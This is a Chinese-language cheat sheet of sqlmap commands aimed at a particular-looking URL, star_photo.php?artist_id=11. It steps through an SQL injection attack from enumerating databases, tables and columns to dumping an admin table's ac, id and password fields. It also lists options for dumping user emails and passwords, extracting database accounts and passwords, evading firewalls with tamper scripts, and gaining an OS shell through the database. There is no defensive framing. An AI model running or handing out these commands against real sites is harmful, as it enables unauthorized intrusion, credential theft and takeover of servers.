sqlmap -u http://aa.com/star_photo.php?artist_id=11
sqlmap -u http://aa.com/star_photo.php?artist_id=11 --dbs
sqlmap -u http://aa.com/star_photo.php?artist_id=11 --current-db
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 --tables
‘vhost48330’ 为指定数据库名称
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns ‘admin’ 为指定表名称
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump ‘ac,id,password’ 为指定字段名称
1.列数据库信息:–dbs
2.web当前使用的数据库–current-db
3.web数据库使用账户–current-user
4.列出sqlserver所有用户 --users
5.数据库账户与密码 --passwords
6.指定库名列出所有表 -D database --tables
-D:指定数据库名称
7.指定库名表名列出所有字段 -D antian365-T admin --columns
-T:指定要列出字段的表
8.指定库名表名字段dump出指定字段
-D secbang_com -T admin -C id,password ,username --dump
-D antian365 -T userb -C"email,Username,userpassword" --dump
可加双引号,也可不加双引号。
9.导出多少条数据
-D tourdata -T userb -C"email,Username,userpassword" --start 1 --stop 10 --dump
参数:
–start:指定开始的行
–stop:指定结束的行
此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。
–tamper[脚本] 使用脚本爆破
–safe-url : 防止多次访问错误url被服务器拒接访问
–os-cmd或 --os-shell 数据库mof提权
-delay 延时多少秒进行下一步
-batch 默认选项yes
–identify -waf 检查防火墙类型
–thread 10 设置进程(最大为10)
–level 注入等级(1-3)
-r 加载文件中的http请求
